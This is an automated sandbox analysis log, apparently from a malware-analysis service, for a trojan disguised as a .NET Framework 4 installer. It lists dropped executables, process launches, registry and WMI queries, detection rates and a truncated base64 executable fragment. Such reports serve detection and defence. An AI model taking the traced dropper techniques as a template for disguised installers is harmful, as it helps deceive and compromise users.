                          Source: SetupResources.dll3.2.drStatic PE information: No import functions for PE file found
                          Source: SetupResources.dll6.2.drStatic PE information: No import functions for PE file found
                          Source: SetupResources.dll20.2.drStatic PE information: No import functions for PE file found
                          Source: SetupResources.dll0.2.drStatic PE information: No import functions for PE file found
                          Source: SetupResources.dll11.2.drStatic PE information: No import functions for PE file found
                          Source: SetupResources.dll7.2.drStatic PE information: No import functions for PE file found
                          Source: dotNetFx40_Full_setup.exe, 00000000.00000002.804432144.000000001303C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBoxStub.exeT vs dotNetFx40_Full_setup.exe
                          Source: dotNetFx40_Full_setup.exe, 00000000.00000002.804432144.000000001303C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesystem.exeH vs dotNetFx40_Full_setup.exe
                          Source: dotNetFx40_Full_setup.exe, 00000000.00000002.807310962.000000001B650000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs dotNetFx40_Full_setup.exe
                          Source: dotNetFx40_Full_setup.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dotNetFx40_Full_setup.exe.logJump to behavior
                          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@13/135@2/2
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeCode function: 2_2_00218DAE FormatMessageW,GetLastError,LocalFree,2_2_00218DAE
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C93E9B4 ChangeServiceConfigW,4_2_6C93E9B4
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C4A7A10 LoadResource,LockResource,SizeofResource,4_2_6C4A7A10
                          Source: dotNetFx40_Full_setup.exeVirustotal: Detection: 56%
                          Source: dotNetFx40_Full_setup.exeReversingLabs: Detection: 51%
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\dotNetFx40_Full_setup.exe C:\Users\user\Desktop\dotNetFx40_Full_setup.exe
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeProcess created: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe "C:\ProgramData\Start Menu\G5K9HNJ7.exe"
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeProcess created: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe "C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe"
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeProcess created: C:\6c8944922f7b98d0b6cd82b768\Setup.exe C:\6c8944922f7b98d0b6cd82b768\\Setup.exe /x86 /x64 /ia64 /web
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /i "C:\Users\user\AppData\Local\Temp\BlockersInfo1.rtf
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeProcess created: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe "C:\ProgramData\Start Menu\G5K9HNJ7.exe" Jump to behavior
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeProcess created: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe "C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe" Jump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeProcess created: C:\6c8944922f7b98d0b6cd82b768\Setup.exe C:\6c8944922f7b98d0b6cd82b768\\Setup.exe /x86 /x64 /ia64 /webJump to behavior
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /i "C:\Users\user\AppData\Local\Temp\BlockersInfo1.rtfJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C944DC9 AdjustTokenPrivileges,4_2_6C944DC9
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeFile created: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeJump to behavior
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C4A6525 __EH_prolog3_catch,CoInitialize,CoCreateInstance,CoUninitialize,__CxxThrowException@8,4_2_6C4A6525
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeCode function: 2_2_0021774A GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLastError,GetLogicalDriveStringsW,CharUpperW,_wcschr,GetDiskFreeSpaceExW,2_2_0021774A
                          Source: dotNetFx40_Full_setup.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dllJump to behavior
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C48EFE2 CreateToolhelp32Snapshot,_memset,Process32FirstW,Process32NextW,FindCloseChangeNotification,4_2_6C48EFE2
                          Source: dotNetFx40_Full_setup.exe, Program.csBase64 encoded string: 'TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAEAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACdHOry2X2Eodl9hKHZfYShGSwaodh9hKH+u+mh2n2EodAFB6HYfYShyC8vofJ9hKHILxqhy32EocgvLqGwfYSh0AUXocx9hKHZfYWhG32EoRksK6GcfYShGSwvodh9hKEZLB+h2H2EoRksHqHYfYShGSwZodh9hKFSaWNo2X2EoQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFBFAABMAQUApo7PSgAAAAAAAAAA4AAiAQsBCgAAhgIAAF4AAAAAAADGkQEAABAAAACgAgAAAEAAABAAAAACAAAFAAEACgAAAAUAAQAAAAAAAEADAAAEAABhOA4AAgBAgQAAEAAAIAAAAAAQAAAQAAAAAAAAEAAAAECUAgCaAAAARIUCANwAAAAA8AIAhB0AAAAAAAAAAAAA4HoNAGgXAAAAEAMAbBkAAOASAAAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAqFYAAEAAAAAAAAAAAAAAAAAQAACcAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALnRleHQAAADahAIAABAAAACGAgAABAAAAAAAAAAAAAAAAAAAIAAAYC5kYXRhAAAAADcAAACgAgAAFAAAAIoCAAAAAAAAAAAAAAAAAEAAAMAuYm94bGQwMcIAAAAA4AIAAAIAAACeAgAAAAAAAAAAAAAAAABAAABALnJzcmMAAACEHQAAAPACAAAeAAAAoAIAAAAAAAAAAAAAAAAAQAAAQC5yZWxvYwAAEigAAAAQAwAAKgAAAL4CAAAAAAAAAAAAAAAAAEAAAEIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANSIAgDmiAIA/IgCALyIAgAAAAAAEQAAgAAAAAAWAACAFwAAgBQAAIAAAAAAlIkCAJyJAgCyiQIAyIkCANaJAgDsiQIACIoCABiKAgAoigIAQIoCAFiKAgBwigIAfIoCAIKJAgCaigIArIoCALiKAgDKigIA5IoCAPqKAgAKiwIAGIsCACqLAgA6iwIATosCAGKLAgBwiwIAgIsCAJKLAgCoiwIAcokCAFiJAgAglAIASIkCAC6JAgAaiQIAjooCAJCTAgCCkwIAcpMCAFqTAgBAkwIAKJMCABqTAgAAkwIA6JICANiSAgDGkgIAupICAKaSAgCYkgIAipICAJiNAgCqjQIAwI0CANKNAgDwjQIA/o0CAAqOAgAajgIAMI4CAEaOAgBgjgIAdo4CAJCOAgCijgIAyo4CANiOAgDkjgIA8o4CAACPAgAKjwIAIo8CADKPAgBIjwIAYI8CAG6PAgCIjwIAno8CALiPAgDMjwIA4I8CAPyPAgAQkAIAHJACACiQAgAykAIAPpACAFCQAgBckAIAbJACAHiQAgCKkAIAmpACAKyQAgDCkAIA1JACAOCQAgDukAIACpECABqRAgAqkQIAPpECAEyRAgBckQIAcJECAHyRAgCOkQIAnpECALiRAgDakQIA6JECAP6RAgAQkgIAIJICACySAgBEkgIAXJICAHiSAgAulAIAAAAAAAIAAIAJAACAAAAAAOCLAgDwiwIA0osCAAAAAAAOjAIAJIwCADqMAgAAAAAAXowCAAAAAACCjAIAkIwCAKCMAgC8jAIAyIwCANiMAgDojAIA+IwCAAqNAgAYjQIAKo0CADaNAgBIjQIAWo0CAGyNAgDEkwIAfo0CAAAAAADSkwIAApQCAOyTAgAAAAAAAAAAAAAAAAAAAAAA9Y9BAMW/QQBAykEAMtVBADsZQgCul0EAAAAAAAAAAABXLUIAe8BBAAAAAAAAAAAAAAAAAAAAAAAAAAAApo7PSgAAAAACAAAAJAAAAPBWAADwSgAAU2V0UHJvY2Vzc0RFUFBvbGljeQBLAEUAUgBOAEUATAAzADIALgBEAEwATAAAAAAAQ29yRXhpdFByb2Nlc3MAAG0AcwBjAG8AcgBlAGUALgBkAGwAbAAAAHIAdQBuAHQAaQBtAGUAIABlAHIAcgBvAHIAIAAAAAAADQAKAAAAAABUAEwATwBTAFMAIABlAHIAcgBvAHIADQAKAAAAUwBJAE4ARwAgAGUAcgByAG8AcgANAAoAAAAAAEQATwBNAEEASQBOACAAZQByAHIAbwByAA0ACgAAAAAAAAAAAFIANgAwADMAMwANAAoALQAgAEEAdAB0AGUAbQBwAHQAIAB0AG8AIAB1AHMAZQAgAE0AUwBJAEwAIABjAG8AZABlACAAZgByAG8AbQAgAHQAaABpAHMAIABhAHMAcwBlAG0AYgBsAHkAIABkAHUAcgBpAG4AZwAgAG4AYQB0AGkAdgBlACAAYwBvAGQAZQAgAGkAbgBpAHQAaQBhAGwAaQB6AGEAdABpAG8AbgAKAFQAaABpAHMAIABpAG4AZABpAGMAYQB0AGUAcwAgAGEAIABiAHUAZwAgAGkAbgAgAHkAbwB1AHIAIABhAHAAcABsAGk
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeMutant created: \Sessions\1\BaseNamedObjects\Global\NetFxSetupMutex
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6752:120:WilError_03
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeCommand line argument: temp2_2_002159A6
                          Source: Setup.exeString found in binary or memory: Pre-Installation Warnings:
                          Source: EQB4OREJ.exe.0.dr, PBE.csCryptographic APIs: 'TransformFinalBlock'
                          Source: 0.2.dotNetFx40_Full_setup.exe.13314658.1.raw.unpack, PBE.csCryptographic APIs: 'TransformFinalBlock'
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MsftEdit.dll
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEWindow detected: Number of UI elements: 15
                          Source: dotNetFx40_Full_setup.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
                          Source: dotNetFx40_Full_setup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                          Source: dotNetFx40_Full_setup.exeStatic file information: File size 2605056 > 1048576
                          Source: dotNetFx40_Full_setup.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x27b800
                          Source: dotNetFx40_Full_setup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Binary string: sqmapi.pdb source: G5K9HNJ7.exe, 00000002.00000003.812362360.0000000005B21000.00000004.00000020.00020000.00000000.sdmp, G5K9HNJ7.exe, 00000002.00000003.813403498.0000000000F52000.00000004.00000020.00020000.00000000.sdmp, G5K9HNJ7.exe, 00000002.00000003.813241400.0000000000F79000.00000004.00000020.00020000.00000000.sdmp, G5K9HNJ7.exe, 00000002.00000003.813657014.0000000000F59000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, Setup.exe, 00000004.00000002.3303901253.000000006C621000.00000020.00000001.01000000.0000000B.sdmp, sqmapi.dll.2.dr
                          Source: Binary string: SetupEngine.pdb source: G5K9HNJ7.exe, 00000002.00000003.812362360.00000000056C5000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, Setup.exe, 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, SetupEngine.dll.2.dr
                          Source: Binary string: boxstub.pdb source: dotNetFx40_Full_setup.exe, 00000000.00000002.804432144.000000001303C000.00000004.00000800.00020000.00000000.sdmp, G5K9HNJ7.exe, G5K9HNJ7.exe, 00000002.00000003.797545019.0000000000F28000.00000004.00000020.00020000.00000000.sdmp, G5K9HNJ7.exe, 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, G5K9HNJ7.exe, 00000002.00000000.797030009.0000000000211000.00000020.00000001.01000000.00000006.sdmp, G5K9HNJ7.exe.0.dr
                          Source: Binary string: SetupUtility.pdb source: G5K9HNJ7.exe, 00000002.00000003.812362360.00000000056C5000.00000004.00000020.00020000.00000000.sdmp, SetupUtility.exe.2.dr
                          Source: Binary string: Setup.pdb source: G5K9HNJ7.exe, 00000002.00000003.812362360.00000000056C5000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, Setup.exe, 00000004.00000000.815079192.0000000000031000.00000020.00000001.01000000.00000009.sdmp, Setup.exe, 00000004.00000002.3249976406.0000000000031000.00000020.00000001.01000000.00000009.sdmp, Setup.exe.2.dr
                          Source: Binary string: SetupResources.pdb source: G5K9HNJ7.exe, 00000002.00000003.812362360.0000000005A75000.00000004.00000020.00020000.00000000.sdmp, SetupResources.dll14.2.dr, SetupResources.dll18.2.dr, SetupResources.dll4.2.dr, SetupResources.dll9.2.dr, SetupResources.dll11.2.dr, SetupResources.dll15.2.dr, SetupResources.dll17.2.dr, SetupResources.dll13.2.dr, SetupResources.dll20.2.dr, SetupResources.dll3.2.dr, SetupResources.dll21.2.dr, SetupResources.dll22.2.dr, SetupResources.dll1.2.dr, SetupResources.dll6.2.dr, SetupResources.dll19.2.dr, SetupResources.dll7.2.dr, SetupResources.dll.2.dr, SetupResources.dll5.2.dr, SetupResources.dll16.2.dr, SetupResources.dll2.2.dr, SetupResources.dll0.2.dr, SetupResources.dll23.2.dr, SetupResources.dll8.2.dr, SetupResources.dll12.2.dr, SetupResources.dll10.2.dr
                          Source: Binary string: SetupUi.pdb source: G5K9HNJ7.exe, 00000002.00000003.812362360.0000000005A75000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, Setup.exe, 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, SetupUi.dll.2.dr
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeCode function: 0_2_00007FFDA15600BD pushad ; iretd 0_2_00007FFDA15600C1
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeCode function: 0_2_00007FFDA1560248 push E95DBB98h; ret 0_2_00007FFDA1560259
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeCode function: 0_2_00007FFDA1560410 push ds; retf 0_2_00007FFDA156042A
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeCode function: 0_2_00007FFDA1562210 push eax; iretd 0_2_00007FFDA156221D
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeCode function: 2_2_0022AB05 push ecx; ret 2_2_0022AB18
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeCode function: 2_2_00234EE0 push ecx; ret 2_2_00234EF3
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeCode function: 3_2_00007FFDA15901B4 push ds; retf 3_2_00007FFDA15901C2
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeCode function: 3_2_00007FFDA159596D push ecx; retf 3_2_00007FFDA15959DC
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeCode function: 3_2_00007FFDA1590241 push ds; retf 3_2_00007FFDA1590242
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeCode function: 3_2_00007FFDA15900BD pushad ; iretd 3_2_00007FFDA15900C1
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeCode function: 3_2_00007FFDA159558D push cs; retf 3_2_00007FFDA1595592
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_00033DF5 push ecx; ret 4_2_00033E08
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C4B2709 push ecx; ret 4_2_6C4B271C
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C4AAA75 push ecx; ret 4_2_6C4AAA88
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C624821 push ecx; ret 4_2_6C624834
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C621B89 push ecx; ret 4_2_6C621B9C
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C976F06 push ecx; ret 4_2_6C976F19
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C96E265 push ecx; ret 4_2_6C96E278
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeCode function: 2_2_0021B4B3 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,2_2_0021B4B3
                          Source: dotNetFx40_Full_setup.exeStatic PE information: 0xB8EB3E69 [Mon Apr 23 16:38:01 2068 UTC]
                          Source: G5K9HNJ7.exe.0.drStatic PE information: section name: .boxld01
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\3082\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1042\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1043\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\sqmapi.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1041\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1044\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1040\SetupResources.dllJump to dropped file
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeFile created: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\3076\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1035\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1036\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\SetupEngine.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1038\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\Setup.exeJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1037\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1031\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1033\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1032\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1028\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1030\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1055\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1029\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1053\SetupResources.dllJump to dropped file
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\SetupUi.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1025\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\2070\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\2052\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\SetupUtility.exeJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1046\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1045\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1049\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1033\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1025\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1028\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1030\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1031\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1029\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1036\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1035\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1032\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1038\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1037\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1040\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1041\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1042\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1044\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1043\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1046\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1045\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1055\eula.rtfJump to behavior
